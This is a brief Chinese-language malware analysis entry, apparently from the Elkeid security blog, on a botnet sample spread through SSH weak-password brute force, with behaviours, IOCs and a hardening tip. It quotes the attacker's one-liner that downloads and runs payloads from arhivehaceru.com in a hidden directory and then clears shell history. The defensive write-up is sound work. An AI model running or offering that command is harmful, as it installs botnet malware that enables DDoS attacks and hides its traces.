Elkeid blogs

简述

arhivehaceru_Update为botnet样本，下载自arhivehaceru.com域名，感染主机后构建僵尸网络，可发动DDos攻击。

elkeid 样本ID

• elkeid_20221202_botnet_8

捕获时间

• 20221202

最近活跃时间

• 20221202

关键词

./History,arhivehaceru

已知入侵途径

• 弱口令爆破

涉及样本

执行目录

• /var/tmp
• /dev/shm

样本

• History

  • shell文件，启动脚本

• Update

  • bot程序

主要行为

• ssh行为

  • 收集信息

    • bash -c uname -s -v -n -r -m
    • bash -c curl ipinfo.io/org
    • bash -c nproc

  • 下载并赋权执行 "History" -bash -c cd /var/tmp || cd /dev/shm ; mkdir .update-logs ; cd .update-logs ; wget -q arhivehaceru.com/.x/Update || curl -O -s -L arhivehaceru.com/.x/Update ; wget -q arhivehaceru.com/.x/History || curl -O -s -L arhivehaceru.com/.x/History ; chmod +x * ; ./History ;

  • 清除历史记录

    • history -c

• History行为

  • 执行Update

    • pidof Update
    • ./Update

• Update

  • bot程序，暂无捕获行为

IOC

已知情报

• https://www.virustotal.com/gui/file/0037cc30be8824b8d5c1576d6a93342de063778ee210d3127de6c3b1173de451

安全配置建议

• 避免使用弱密码或默认密码

参考链接